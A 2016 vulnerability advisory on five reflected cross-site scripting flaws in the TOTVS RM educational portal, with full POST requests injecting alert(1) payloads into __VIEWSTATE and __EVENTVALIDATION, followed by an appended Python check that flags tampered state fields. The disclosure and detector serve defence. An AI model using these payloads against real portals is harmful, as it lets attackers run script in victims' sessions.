TOTVS RM PORTAL Cross Site Scripting
Posted on 17 February 2016
TOTVS RM PORTAL (Educational) - Multiple Cross Site Scripting Vulnerabilities

Product web page: www.totvs.com.br
Author: vesp3r
Email: vesp3r7c3@gmail.com
Published: 13/02/2016

[Vendor Product Description]

TOTVS (pronounced Totus) is a Brazilian software company with headquarters in Sao Paulo. TOTVS was initially formed from the merger of the Microsiga and Logocenter companies. It is the largest software company in Latin America. According to the FGV, TOTVS is the leader in the Brazilian ERP market; besides Brazil, it has offices in Argentina, Mexico and the United States.

[Advisory Timeline]

1- 22/Dec/2015 (No vendor response)
2- 05/Feb/2016 (No vendor response)

Tested on:
11.40.80.x
11.52.50.x
11.52.63.x
11.52.64.x
11.82.41.1
11.82.37.0
11.82.41.112
11.82.42.1
12.1.6.108
12.1.6.117
12.1.7.100
12.1.7.110
12.1.7.120
12.1.8.0
12.1.8.1

[Vulnerability Details]

An attacker can exploit reflected XSS through the unprotected __VIEWSTATE and __EVENTVALIDATION parameters, which several pages echo back into the response without encoding. A remote attacker can trick a logged-in administrator into opening a specially crafted link and execute arbitrary JavaScript in the victim's browser in the context of the vulnerable website.

1) Reflected Cross-site Scripting - Login.aspx
Parameter: __VIEWSTATE

POST /corpore.net/Login.aspx HTTP/1.1
[Snip...]
Content-Length: 599
Expect: 100-continue
Connection: Keep-Alive

__VIEWSTATEGENERATOR=67BA4204&__EVENTARGUMENT=&txtPass=&__VIEWSTATE=%2fwEPDwULLTE4NzE2MDUyNDEPZBYCAgUPZBYCAgMPZBYKAgQPFgIeDUVudGVyRGlzYWJsZWQFBUZhbHNlZAIIDxYCHwAFBUZhbHNlZAIMDxBkDxYBZhYBEAUJQ29ycG9yZVJNBQlDb3Jwb3JlUk1nFgFmZAIQDw9kFgIeD0Rpc2FibGVPblN1Ym1pdAUFZmFsc2VkAhIPD2QWAh4Hb25jbGljawURRm9yZ290UGFzc3dvcmQoKTtkZOnQ03VTJ%2f9xMgjAXrV8uog9rRH%2flHTcm8QGAjB9nwz8a0d92<script>alert(1)<%2fscript>cd412&ddlAlias=CorporeRM&txtUser=&btnLogin=btnLogin%3dAcessar&__EVENTTARGET=&__EVENTVALIDATION=%2fwEdAAVhABOpj5tofEWFrJaBMLLmDFTzKcXJqLg%2bOeJ6QAEa2kPTPkdPWl%2b8YN2NtDCtxie46B0WtOk572tmQWZGjlgiop4oRunf14dz

2) Reflected Cross-site Scripting - EduPSCadastroCandidato.aspx
Parameter: __VIEWSTATE

POST /Corpore.Net/Source/EduPS-ProcessoSeletivo/Public/EduPSCadastroCandidato.aspx HTTP/1.1
[Snip...]
Content-Length: 294
Expect: 100-continue
Connection: Keep-Alive

__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=26e09<script>alert(1)<%2fscript>6675c&__VIEWSTATEGENERATOR=2A268E6E&__EVENTVALIDATION=%2FwEdAGthFF%2FXOtK6iDwfhX1K6Jqoyk0VTIKR5mmZ%2BtIHMzMSvhs0Jc5vMLgh%2BScncp5A4h37bPOfETC9GIxfmAuz0Irc0oWQaruiZXPsPoJusmqmY3neRyPHmUYXvOoYPCF%2BNI6bJS0pQ

3) Reflected Cross-site Scripting - Calendar.aspx
Parameter: __VIEWSTATE

POST /Corpore.Net/SharedServices/LibPages/Calendar.aspx HTTP/1.1
[Snip..]
Content-Type: application/x-www-form-urlencoded
Content-Length: 370
Expect: 100-continue

__VIEWSTATEGENERATOR=CBEC090A&__EVENTARGUMENT=&__VIEWSTATE=%2fwEPDwUKMTY1OTMzMTQ5MmRk0Sm9YhG2VrmP7sr3Vdu25PXWEY00sTB9uOI0E2J%2bDto%3d8f844<script>alert(1)<%2fscript>f1c95&ddYear=1940&ddMonth=1&__LASTFOCUS=&__EVENTTARGET=&__EVENTVALIDATION=%2fwEdANEBWDAi1sF9XTMpt%2bPoIvbLLrtqFwodORsBP5MdtMp97Worg0EVYGtniwWRlldVBtgv0s7aRHloaIopjAs%2b7nenbhd3yRDnFv26m%2by5T5c3Rd7F9O8yK3w

4) Reflected Cross-site Scripting - TstMain.aspx
Parameter: __VIEWSTATE

POST /Corpore.Net/Source/Tst-Avaliacao/RM.Tst.Provas/Public/TstMain.aspx HTTP/1.1
Referer: http://intra.ubm.br/Corpore.Net/Source/Tst-Avaliacao/RM.Tst.Provas/Public/TstMain.aspx
[Snip..]
Content-Length: 589
Expect: 100-continue
Connection: Keep-Alive

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=blFubtHIte6TnItfljNkVuCPdpxrn2d21QVLovI1Oj6c1BjTFGCeNA%2bNH1hljOzffBO%2bE1VjGIfJORklj03DwzHH9gnfklyMHTfrSc6jXT0lmgWQ%2fn09OLOLHFy22L%2f09cQ2cnhIJ8zjXTNBkJOTrizTSX8roB4A2%2f5F0nw%2bHMedUzRwjzgcvas%2bVdOqpdrMgp%2bqwioI9MguZtfxVD7ONhnPDwo%2bUgLB2QraeHh4Fd7DAFy2BsVsCl7an3DaKlx0pMIwi%2f2g%2f8y%2f5VXL1WbXYw%3d%3d63eb9<script>alert(1)<%2fscript>35554&__VIEWSTATEGENERATOR=D041C7D7&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=oIbBDabE%2FPH2SjDjDsk1A4dri3DAV4qax04lAj1I%2B3JimDK%2Bq%2Bl4qrek8MK8H861dVvJHSx56%2BNa5v49Ol5ulZsG3D1QPnf2XgNT1yp2LaTarGQOsUfw60t

5) Reflected Cross-site Scripting - RecoverPassConfirmation.aspx
Parameter: __EVENTVALIDATION

POST /Corpore.Net/SharedServices/LibPages/RecoverPassConfirmation.aspx?UserCaption=5LK%5c9F%5c3D%5c023%5c5B&ConfirmationCaption=%5c7B%5cFAbP%5c06%5c11Q%5c7C&RecoverContainerClassName=ASP.login_aspx%2c+App_Web_jfz24ryx%2c+Version%3d0.0.0.0%2c+Culture%3dneutral%2c+PublicKeyToken%3dnull&RecoverInitializeMethodName=GetRecoverPassServer&ServiceAlias=CorporeRM HTTP/1.1
[Snip..]
Content-Type: application/x-www-form-urlencoded
Content-Length: 458

__EVENTTARGET=btConcluir&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTE2NDcyMzE4MDYPZBYCAgMPZBYEAgQPDxYCHgRUZXh0BQhVc3XDoXJpb2RkAgoPDxYCHwAFBUVtYWlsZGRkb5MeS264FOK9nmP0a1CNQffkay3Ey3ZEBuou6pi65D8%3D&__VIEWSTATEGENERATOR=AF2B313E&__EVENTVALIDATION=%2fwEdAAQGOgL7oK09LZ8PS37yV0yhEtmPWx9iivvmRAEsPWDH1L%2bBuAd%2fYR2jHO%2bKtDPe6m0Cy01bBAlsk2p17oJudhiaquajs%2bXic334N3XfjA0JtMaIEGbBaz%2fyyDVIoKpthJc%3dd8504<script>alert(1)<%2fscript>a2460&TextBoxUser=a%40a.com&TextBoxConfirmation=a%40a.com

Thanks to: Ewerson Guimarães (Crash) and Rodrigo Favarini
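As an added defensive example (not part of the advisory or the vendor's code), the check below flags POST bodies whose __VIEWSTATE or __EVENTVALIDATION field cannot be genuine ASP.NET serializer output, the pattern every request above shares (script markup appended to the state blob); it is meant for WAF-rule testing or request-log review, and assumes the FF 01 ObjectStateFormatter prefix for unencrypted state and that __VIEWSTATEENCRYPTED signals encrypted state, with constructed sample bodies rather than the advisory's own.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlencode

# WebForms hidden fields that the advisory shows being reflected without encoding.
WATCHED_FIELDS = ("__VIEWSTATE", "__EVENTVALIDATION")
# Unencrypted ObjectStateFormatter output starts with the token bytes FF 01,
# which is why genuine values begin with "/wE" once URL-decoded.
LOS_MARKER = b"\xff\x01"
MARKUP = re.compile(r"[<>\"'()]")


def classify_state(value: str, encrypted: bool = False) -> str:
    """Verdict for one URL-decoded hidden-field value: "ok", "markup"
    (HTML/script characters), "not-base64" (cannot be serializer output)
    or "no-marker" (decodes but lacks FF 01; skipped for encrypted state)."""
    if MARKUP.search(value):
        return "markup"
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return "not-base64"
    if not encrypted and not raw.startswith(LOS_MARKER):
        return "no-marker"
    return "ok"


def scan_form_body(body: str) -> list:
    """Return [(field, verdict)] for every watched field that is not "ok"."""
    params = parse_qs(body, keep_blank_values=True)
    # Assumption: __VIEWSTATEENCRYPTED is sent (even empty) when view state is
    # encrypted, in which case the FF 01 marker check does not apply.
    encrypted = "__VIEWSTATEENCRYPTED" in params
    findings = []
    for field in WATCHED_FIELDS:
        for value in params.get(field, []):
            verdict = classify_state(value, encrypted)
            if verdict != "ok":
                findings.append((field, verdict))
    return findings


# Constructed sample bodies (not captured from the product).
_GOOD_STATE = base64.b64encode(LOS_MARKER + b"\x0f\x0f\x05\x0adummy").decode()
BENIGN_BODY = urlencode({"__VIEWSTATE": _GOOD_STATE, "__EVENTVALIDATION": _GOOD_STATE})
# Same shape as the advisory's requests: payload appended to an otherwise valid blob.
TAMPERED_BODY = urlencode({"__VIEWSTATE": _GOOD_STATE + "63eb9<script>alert(1)</script>35554",
                           "__EVENTVALIDATION": _GOOD_STATE})
```

This only detects tampering; the fix on the application side is to keep ViewState MAC validation enabled and to HTML-encode any hidden-field value before writing it back into the page.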